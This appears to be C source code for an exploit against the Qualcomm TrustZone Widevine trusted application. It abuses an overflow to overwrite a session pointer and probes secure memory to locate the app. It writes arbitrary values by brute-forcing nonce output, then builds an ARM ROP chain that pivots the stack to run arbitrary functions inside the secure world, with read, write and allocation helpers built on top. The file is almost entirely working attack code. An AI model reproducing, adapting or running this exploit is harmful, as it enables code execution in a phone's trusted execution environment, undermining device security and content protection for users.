#include <stdio.h>
#include <string.h>
#include <errno.h>
#include "exploit_utilities.h"
#include "QSEEComAPI.h"
#include "widevine_commands.h"
#include "symbols.h"
#include "defs.h"
#include "vuln.h"

/**
 * The physical address of the request buffer.
 */
int g_request_buffer_physical_address = 0;

/**
 * A flag indicating if the pivot gadget has been written.
 */
int g_wrote_pivot_address = 0;

int is_marked_page(struct qcom_wv_handle* handle, uint32_t addr) {

	//Going over each element in the sync pattern	
	for (uint32_t i=0; i<sizeof(g_sync_pattern)/(2*sizeof(uint32_t)); i++) {
			
		//Trying to overwrite the session pointer so that we'll probe the i-th element in the sync pattern
		overwrite_session_pointer(handle, 0, addr + START_OVERFLOW_OFFSET - DERIVE_KEY_PROBE_OFFSET + i*4);
		int derive_res = derive_keys_from_session_key(handle, 0, 1, 1, 1);

		//Did we crash?
		if (derive_res == 0) {
			(*handle->QSEECom_shutdown_app)((struct QSEECom_handle **)&handle->qseecom);
			(*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
										  WIDEVINE_PATH, WIDEVINE_APP_NAME, WIDEVINE_BUFFER_SIZE);
			return PAGE_INVALID;	
		}
		//Is this a "one" result?
		else if (derive_res == ONE_RESULT) {
			if (!g_sync_pattern[2*i] == 1) {
				printf("[+] Match sync pattern element %d\n", i);
			}
			else {
				printf("[-] Sync element pattern mismatch\n");
				return PAGE_NOT_MARKED;
			}
		}
		//Is this a "non-one" result?
		else if (derive_res == NON_ONE_RESULT) {
			if (!g_sync_pattern[2*i] != 1) {
				printf("[+] Match sync pattern element %d\n", i);
			}
			else {
				printf("[-] Sync element pattern mismatch\n");
				return PAGE_NOT_MARKED;
			}
		}
		else {
			printf("[-] Unknown deriviation result: %d, aborting!\n", derive_res);
			return PAGE_INVALID;
		}	
	}
	return PAGE_MARKED;
}

void* find_widevine_application(struct qcom_wv_handle* handle) {

	//Searching for the Widevine application in the secure app region using the sync pattern
	for (uint32_t addr = SECURE_APP_REGION_START + DATA_SEGMENT_OFFSET; addr < SECURE_APP_REGION_END; addr += DATA_SEGMENT_OFFSET) {

		//Trying to probe the current page to see if there's anything there
		printf("[+] Trying to probe 0x%08X\n", addr);
		overwrite_session_pointer(handle, 0, addr);
		int derive_res = derive_keys_from_session_key(handle, 0, 1, 1, 1);
		
		//Did we crash?
		if (derive_res == 0) {
			printf("[+] Crashed, jumping ahead\n");
			(*handle->QSEECom_shutdown_app)((struct QSEECom_handle **)&handle->qseecom);
			(*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
										  WIDEVINE_PATH, WIDEVINE_APP_NAME, WIDEVINE_BUFFER_SIZE);
			continue;
		}
		printf("[+] Didn't crash, starting to scan linearly\n");

		//Otherwise, since we didn't crash, let's start scanning sequentially
		while (true) {
			printf("[+] Scanning page %08X for sync pattern\n", addr);
			int marked_page_res = is_marked_page(handle, addr);
			if (marked_page_res == PAGE_INVALID) {
				printf("[+] Crashed in linear scan, jumping ahead\n");
				//We crashed, so advance by DATA_SEGMENT_OFFSET
				break;
			}
			else if (marked_page_res == PAGE_NOT_MARKED) {
				printf("[+] Not a marked page, continuing to scan\n");
				addr += 0x1000;
			}
			else {
				//Found the sync pattern!
				printf("[+] Found!\n");
				return (void*)(addr - DATA_SEGMENT_OFFSET); 
			}
		}

	}
	return NULL;
}

void write_dword_messy(struct qcom_wv_handle* handle, uint32_t val, uint32_t addr) {

	//Iterating over each byte of the wanted value
	for (int i=0; i<sizeof(uint32_t); i++) {
		uint8_t wanted_byte = (val >> (i*8)) & 0xFF;
		while (true) {

			//Need to overwrite the session pointer each iteration because there's a counter when
			//generating the nonce which will prevent the nonce generation from happening after
			//16 calls. Thankfully, this counter is one of the pieces of information which is
			//overwritten by the overflow, and so each time we write the session pointer, the counter
			//is reset to zero
			overwrite_session_pointer(handle, 0, addr + i - NONCE_GENERATION_OFFSET);
			
			//Generating a random value into the target location
			uint32_t nonce;
			generate_nonce(handle, 0, &nonce);

			//Is this our wanted value?
			uint8_t generated_byte = (uint8_t)(nonce & 0xFF);
			if (wanted_byte == generated_byte) {
				printf("[+] Got a byte!\n");
				break;
			}
		}
	}
}

int execute_function(struct qcom_wv_handle* handle, void* app, uint32_t function_address, uint32_t arg1, uint32_t arg2, uint32_t arg3, uint32_t arg4) {
	
	//Initializing the request and response buffers
	uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000); //BUGFIX: Need a large size for functions that use a lot of stack space!
												   //This also means all the offsets must be into the "middle" of this buffer
												   //rather than the end, to allow to stack to expand in that direction
	uint32_t cmd_resp_size = QSEECOM_ALIGN(0x400);
	uint32_t* cmd_req = malloc(cmd_req_size);
	uint32_t* cmd_resp = malloc(cmd_resp_size);
	memset(cmd_req, 0, cmd_req_size);
	memset(cmd_resp, 0, cmd_resp_size);
	
	int res;

	if (!g_request_buffer_physical_address) {
	
		//Setting the request code
		cmd_req[0] = wrapper_get_hdcp_capability;
	
		//First, writing a gadget which'll give us the physical address of R0 in the response buffer
		//This is so that we can later pivot to this address as a stack
		uint32_t wanted_target_ptr = (uint32_t)app + STR_R0_R1_BX_LR_OFFSET;
		uint32_t overwrite_address = (uint32_t)app + DATA_SEGMENT_OFFSET + OVERWRITE_FUNCTION_POINTER_OFFSET;
		write_dword_messy(handle, wanted_target_ptr, overwrite_address);
		write_dword_messy(handle, 0x80004, overwrite_address + sizeof(uint32_t));
	
		//Executing the function to get the physical address of the buffer
		res = (*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
		if (res < 0) {
			free(cmd_req);
			free(cmd_resp);
			perror("[-] Unable to enable clks");
			return -errno;
		}
	
		res = (*handle->QSEECom_send_cmd)(handle->qseecom,
										  cmd_req,
										  cmd_req_size,
										  cmd_resp,
										  cmd_resp_size);
	
		if ((*handle->QSEECom_set_bandwidth)(handle->qseecom, false)) {
			perror("[-] Import key command: (unable to disable clks)");
		}
	
		g_request_buffer_physical_address = cmd_resp[0];
		printf("[+] Request buffer physical address: 0x%08X\n", g_request_buffer_physical_address);
	}

	if (!g_wrote_pivot_address) {
		//Writing the function pointer to the gadget which pivots using our request buffer
		uint32_t wanted_target_ptr = (uint32_t)app + STR_R0_R1_BX_LR_OFFSET;
		uint32_t overwrite_address = (uint32_t)app + DATA_SEGMENT_OFFSET + OVERWRITE_FUNCTION_POINTER_OFFSET;
		wanted_target_ptr = (uint32_t)app + LDM_R0_R0_R2_R3_IP_SP_LR_PC_OFFSET;
		write_dword_messy(handle, wanted_target_ptr, overwrite_address);
		write_dword_messy(handle, 0x80004, overwrite_address + sizeof(uint32_t));

		g_wrote_pivot_address = 1;
	}

	//Writing the values which are popped off of the request buffer in the initial pivot
	uint32_t idx = 0;
	cmd_req[idx++] = wrapper_get_hdcp_capability;
	cmd_req[idx++] = GARBAGE_VALUE;													//R2
	cmd_req[idx++] = GARBAGE_VALUE;													//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//IP
	cmd_req[idx++] = g_request_buffer_physical_address + CRAFTED_STACK_OFFSET;		//SP
	cmd_req[idx++] = GARBAGE_VALUE;													//LR
	cmd_req[idx++] = (uint32_t)app + POP_R0_R1_R3_PC_OFFSET;						//PC
	
	//Moving to the location of the crafted stack!
	idx = (CRAFTED_STACK_OFFSET / sizeof(uint32_t));

	//Start of our crafted stack!
	//Setting R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R0
	cmd_req[idx++] = arg2;															//R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R3

	//Setting R0, R2, R3
	cmd_req[idx++] = (uint32_t)app + POP_R0_R2_R3_R4_PC_OFFSET;						//PC
	cmd_req[idx++] = arg1;															//R0
	cmd_req[idx++] = arg3;															//R2
	cmd_req[idx++] = arg4;															//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//R4

	//Setting IP for the call
	cmd_req[idx++] = (uint32_t)app + POP_R4_R6_R9_FP_IP_PC_OFFSET;					//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R6
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET;							//R9
	cmd_req[idx++] = GARBAGE_VALUE;													//FP
	cmd_req[idx++] = function_address;												//IP

	//Jumping to the function!
	cmd_req[idx++] = (uint32_t)app + POP_R4_R5_R6_LR_BX_IP_OFFSET;					//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R6

	//Saving the return value in the version field in the application's data segment
	cmd_req[idx++] = (uint32_t)app + POP_R1_R3_R5_R7_PC_OFFSET;						//LR
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET + 556 - 520;				//R1
	cmd_req[idx++] = GARBAGE_VALUE;													//R3
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R7
	cmd_req[idx++] = (uint32_t)app + STR_R0_R1_520_POP_R4_R5_R6_PC_OFFSET;			//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//R5
	cmd_req[idx++] = GARBAGE_VALUE;													//R6

	//Popping the stack pointer to the original location
	uint32_t stack_location_for_r0 = g_request_buffer_physical_address + (idx + 10)*4;
	cmd_req[idx++] = (uint32_t)app + POP_R0_R1_R3_PC_OFFSET;						//PC
	cmd_req[idx++] = stack_location_for_r0;											//R0 
	cmd_req[idx++] = GARBAGE_VALUE;													//R1 
	cmd_req[idx++] = GARBAGE_VALUE;													//R3 

	//Building the R0 values acting as a stack
	cmd_req[idx++] = (uint32_t)app + LDMDB_R0_R4_IP_SP_LR_PC_OFFSET;				//PC
	cmd_req[idx++] = GARBAGE_VALUE;													//R4
	cmd_req[idx++] = GARBAGE_VALUE;													//IP
	cmd_req[idx++] = (uint32_t)app + DATA_SEGMENT_OFFSET + CALC_STACK_TOP_OFFSET;	//SP
	cmd_req[idx++] = GARBAGE_VALUE;													//LR
	cmd_req[idx++] = (uint32_t)app + MAIN_LOOP_RET_OFFSET;							//PC

	res = (*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
	if (res < 0) {
		free(cmd_req);
		free(cmd_resp);
		perror("[-] Unable to enable clks");
		return -errno;
	}

	res = (*handle->QSEECom_send_cmd)(handle->qseecom,
									  cmd_req,
									  cmd_req_size,
									  cmd_resp,
									  cmd_resp_size);

	if ((*handle->QSEECom_set_bandwidth)(handle->qseecom, false)) {
		perror("[-] Import key command: (unable to disable clks)");
	}

	//Freeing the buffers allocated
	free(cmd_req);
	free(cmd_resp);

	//Returning the value which was written into the version field
	return send_cmd_1026(handle);

}

void write_dword(struct qcom_wv_handle* handle, void* app, uint32_t value, uint32_t address) {
	execute_function(handle, app, (uint32_t)app + WRITE_DWORD_OFFSET, value, address, 0, 0);
}

void write_range(struct qcom_wv_handle* handle, void* app, uint32_t address, void* data, uint32_t length) {

	//Writing all the DWORDs in the buffer
	for (int i=0; i<length/sizeof(uint32_t); i++) {
		write_dword(handle, app, ((uint32_t*)data)[i], address + i*sizeof(uint32_t));
	}

	//Writing the remaining bytes
	uint32_t last_idx = (length / sizeof(uint32_t)) * sizeof(uint32_t);
	for (int i=0; i<length % sizeof(uint32_t); i++) {
		execute_function(handle,
						 app,
						 (uint32_t)app + STRB_R0_R2_BX_LR_OFFSET,
						 ((uint8_t*)data)[last_idx + i],
					 	 0,
						 address + (last_idx * sizeof(uint32_t)) + i,
						 0);
	}

}

uint32_t read_dword(struct qcom_wv_handle* handle, void* app, uint32_t address) {
	return execute_function(handle, app, (uint32_t)app + READ_DWORD_OFFSET, address, 0, 0, 0);
}

uint32_t tz_malloc(struct qcom_wv_handle* handle, void* app, uint32_t size) {
	return execute_function(handle, app, (uint32_t)app + MALLOC_OFFSET, size, 0, 0, 0);
}
